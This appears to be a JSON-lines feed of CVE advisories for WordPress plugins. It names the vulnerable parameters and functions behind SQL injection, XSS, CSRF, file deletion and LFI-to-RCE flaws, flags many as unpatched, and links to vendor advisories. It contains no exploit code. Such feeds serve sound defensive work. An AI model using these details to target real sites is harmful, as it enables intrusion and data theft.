{"CVE_ID":"CVE-2024-5329","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.109","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) plugin for WordPress is vulnerable to blind SQL Injection via the \u2018data[addonID]\u2019 parameter in all versions up to, and including, 1.5.109 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f33d77b7-5412-47bf-9bed-8617151723c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f33d77b7-5412-47bf-9bed-8617151723c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L999\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_addons.class.php#L999\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097249\\\/#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097249\\\/#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/unlimited-elements-for-elementor\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7862","slug":"blogintroduction-wordpress-plugin","versionImpact":"0.3.0","description":"The blogintroduction-wordpress-plugin WordPress plugin through 0.3.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b54cd05-3bb8-4bb9-a0e4-fb00d97d5cae\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9b54cd05-3bb8-4bb9-a0e4-fb00d97d5cae\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10176","slug":"compact-wp-audio-player","versionImpact":"1.9.13","description":"The Compact WP Audio Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's \r\nsc_embed_player shortcode in all versions up to, and including, 1.9.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bba90659-09a8-470a-91d3-d1986562672a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bba90659-09a8-470a-91d3-d1986562672a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/compact-wp-audio-player\\\/trunk\\\/shortcodes-functions.php#L79\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/compact-wp-audio-player\\\/trunk\\\/shortcodes-functions.php#L79\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/compact-wp-audio-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/compact-wp-audio-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173541\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3173541\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12445","slug":"rightmessage","versionImpact":"0.9.7","description":"The RightMessage WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rm_area' shortcode in all versions up to, and including, 0.9.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rightmessage\\\/trunk\\\/includes\\\/class-rightmessage.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/rightmessage\\\/trunk\\\/includes\\\/class-rightmessage.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rightmessage\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rightmessage\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbbb33d-28ed-47f4-a8dd-2fc7564d9df2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efbbb33d-28ed-47f4-a8dd-2fc7564d9df2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23435","slug":"password-protect-plugin-for-wordpress","versionImpact":"0.8.1.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in David Marcucci Password Protect Plugin for WordPress allows Stored XSS.This issue affects Password Protect Plugin for WordPress: from n\/a through 0.8.1.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/password-protect-plugin-for-wordpress\\\/vulnerability\\\/wordpress-password-protect-plugin-for-wordpress-plugin-0-8-1-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/password-protect-plugin-for-wordpress\\\/vulnerability\\\/wordpress-password-protect-plugin-for-wordpress-plugin-0-8-1-0-csrf-to-stored-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13780","slug":"hmenu","versionImpact":"1.16.5","description":"The Hero Mega Menu - Responsive WordPress Menu Plugin plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the hmenu_delete_menu() function in all versions up to, and including, 1.16.5. This makes it possible for unauthenticated attackers to delete arbitrary directories on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17872fe4-b566-44ca-8218-3677fb75cb1c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17872fe4-b566-44ca-8218-3677fb75cb1c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2165","slug":"sh-email-alert","versionImpact":"1.0","description":"The SH Email Alert plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'mid' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sh-email-alert\\\/tags\\\/1.0\\\/manage.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sh-email-alert\\\/tags\\\/1.0\\\/manage.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sh-email-alert\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sh-email-alert\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc20180b-4665-4ade-b512-b0f0148200e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc20180b-4665-4ade-b512-b0f0148200e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5287","slug":"inprosysmedia-likes-dislikes-post","versionImpact":"1.0.0","description":"The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inprosysmedia-likes-dislikes-post\\\/trunk\\\/inprosysmedia-likes-dislikes-post.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/inprosysmedia-likes-dislikes-post\\\/trunk\\\/inprosysmedia-likes-dislikes-post.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad19205d-d355-45d8-be5b-f8005459a8c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad19205d-d355-45d8-be5b-f8005459a8c7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4689","slug":"ap-plugin-scripteo","versionImpact":"4.89","description":"The Ads Pro Plugin - Multi-Purpose WordPress Advertising Manager plugin for WordPress is vulnerable to Local File Inclusion which leads to Remote Code Execution in all versions up to, and including, 4.89. This is due to the presence of a SQL Injection vulnerability and Local File Inclusion vulnerability that can be chained with an image upload. This makes it possible for unauthenticated attackers to execute code on the server upload image files on the server than can be fetched via a SQL injection vulnerability, and ultimately executed as PHP code through the local file inclusion vulnerability.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ads-pro-plugin-multipurpose-wordpress-advertising-manager\\\/10275010\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/038ddfcd-093b-4234-a0b8-a3bf9a3d329f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/038ddfcd-093b-4234-a0b8-a3bf9a3d329f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0336","slug":"ooohboi-steroids-for-elementor","versionImpact":"2.1.3","description":"The OoohBoi Steroids for Elementor WordPress plugin through 2.1.3 has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber to delete attachment.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac74df9a-6fbf-4411-a501-97eba1ad1895\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ac74df9a-6fbf-4411-a501-97eba1ad1895\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2836","slug":"crm-perks-forms","versionImpact":"1.1.1","description":"The CRM Perks Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via form settings in versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917582\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917582\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de11636b-a051-4e76-bc26-ed76f66fe0df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de11636b-a051-4e76-bc26-ed76f66fe0df?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/CPF-xss-exploit.md\",\"name\":\"https:\\\/\\\/github.com\\\/Don-H50\\\/wp-vul\\\/blob\\\/main\\\/CPF-xss-exploit.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1242","slug":"premium-addons-for-elementor","versionImpact":"4.10.18","description":"The Premium Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the button onclick attribute in all versions up to, and including, 4.10.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1026b753-e82b-4fa3-9023-c36ab9863b29?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3035504%40premium-addons-for-elementor%2Ftrunk&old=3025571%40premium-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5259","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.1.11","description":"The MultiVendorX Marketplace \u2013 WooCommerce MultiVendor Marketplace Solution plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hover_animation\u2019 parameter in all versions up to, and including, 4.1.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a349f2-048d-49a5-92ea-c19f1d1cd45e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/59a349f2-048d-49a5-92ea-c19f1d1cd45e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/packages\\\/mvx-elementor\\\/widgets\\\/class-mvx-widget-storesocial.php#L150\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/packages\\\/mvx-elementor\\\/widgets\\\/class-mvx-widget-storesocial.php#L150\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dc-woocommerce-multi-vendor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/dc-woocommerce-multi-vendor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097002\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097002\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4759","slug":"mime-types-extended","versionImpact":"0.11","description":"The Mime Types Extended WordPress plugin through 0.11 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c7547fa-539a-4890-a94d-c57b3d025507\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1c7547fa-539a-4890-a94d-c57b3d025507\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7861","slug":"misiek-paypal","versionImpact":"1.1.20090324","description":"The Misiek Paypal WordPress plugin through 1.1.20090324 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df9aa795-ba16-4806-b01a-311f80aa52c0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df9aa795-ba16-4806-b01a-311f80aa52c0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10790","slug":"admin-site-enhancements","versionImpact":"7.5.1","description":"The Admin and Site Enhancements (ASE) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 7.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with custom-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. This feature must be enabled, and for specific roles in order to be exploitable.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e12fa5-eba4-4f69-ae3a-7e460bfa9e5d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96e12fa5-eba4-4f69-ae3a-7e460bfa9e5d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-site-enhancements\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/admin-site-enhancements\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180884%40admin-site-enhancements%2Ftags%2F7.5.1&new=3185287%40admin-site-enhancements%2Ftags%2F7.5.2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3180884%40admin-site-enhancements%2Ftags%2F7.5.1&new=3185287%40admin-site-enhancements%2Ftags%2F7.5.2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12435","slug":"woocommerce-compare-products","versionImpact":"3.2.1","description":"The Compare Products for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018s_feature\u2019 parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L392\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L392\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L397\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-compare-products\\\/trunk\\\/admin\\\/classes\\\/class-wc-compare-fields.php#L397\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f74c419a-56de-4190-925d-876d32f712e1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f74c419a-56de-4190-925d-876d32f712e1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23423","slug":"wp-sendgrid-mailer","versionImpact":"1.4","description":"Missing Authorization vulnerability in Smackcoders SendGrid for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SendGrid for WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-sendgrid-mailer\\\/vulnerability\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-sendgrid-mailer\\\/vulnerability\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13424","slug":"ni-woo-sales-commission","versionImpact":"1.2.4","description":"The Ni Sales Commission For WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'niwoosc_ajax' AJAX endpoint in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings and modify commission amounts.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ni-woo-sales-commission\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ni-woo-sales-commission\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac4a026b-ed1c-4864-8900-1d70d95af6f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac4a026b-ed1c-4864-8900-1d70d95af6f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13779","slug":"hmenu","versionImpact":"1.16.5","description":"The Hero Mega Menu - Responsive WordPress Menu Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'index' parameter in all versions up to, and including, 1.16.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/hero-menu-responsive-wordpress-mega-menu-plugin\\\/10324895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d37650-057d-4cd1-bfeb-e40885d22566?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18d37650-057d-4cd1-bfeb-e40885d22566?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1490","slug":"smart-maintenance-mode","versionImpact":"1.5.2","description":"The Smart Maintenance Mode plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018setstatus\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-maintenance-mode\\\/trunk\\\/smart-maintenance-mode.php#L562\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smart-maintenance-mode\\\/trunk\\\/smart-maintenance-mode.php#L562\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-maintenance-mode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/smart-maintenance-mode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9ca8ac-e735-4e84-af0f-45d22a8e2124?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ea9ca8ac-e735-4e84-af0f-45d22a8e2124?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5082","slug":"wp-attachments","versionImpact":"5.0.12","description":"The WP Attachments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018attachment_id\u2019 parameter in all versions up to, and including, 5.0.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/html\\\/attachmentEditIframe.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/html\\\/attachmentEditIframe.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/ij-post-attachments.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-attachments\\\/tags\\\/5.0.12\\\/inc\\\/ij-post-attachments.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300269\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3300269\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-attachments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-attachments\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdc33ecc-da54-4852-8426-bfafe0dca41b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bdc33ecc-da54-4852-8426-bfafe0dca41b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4654","slug":"soumettre-fr","versionImpact":"2.1.5","description":"The Soumettre.fr plugin for WordPress is vulnerable to unauthorized access and modification of data due to a improper authorization checks on the make_signature function in all versions up to, and including, 2.1.5. This makes it possible for unauthenticated attackers to create\/edit\/delete Soumettre posts. This vulnerability affects only installations where the soumettre account is not connected (i.e. API key is not installed)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/tags\\\/2.1.5\\\/public\\\/rest\\\/class-soumettre-rest-route.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/soumettre-fr\\\/tags\\\/2.1.5\\\/public\\\/rest\\\/class-soumettre-rest-route.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f29d476-0730-437c-8065-309523278efa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f29d476-0730-437c-8065-309523278efa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
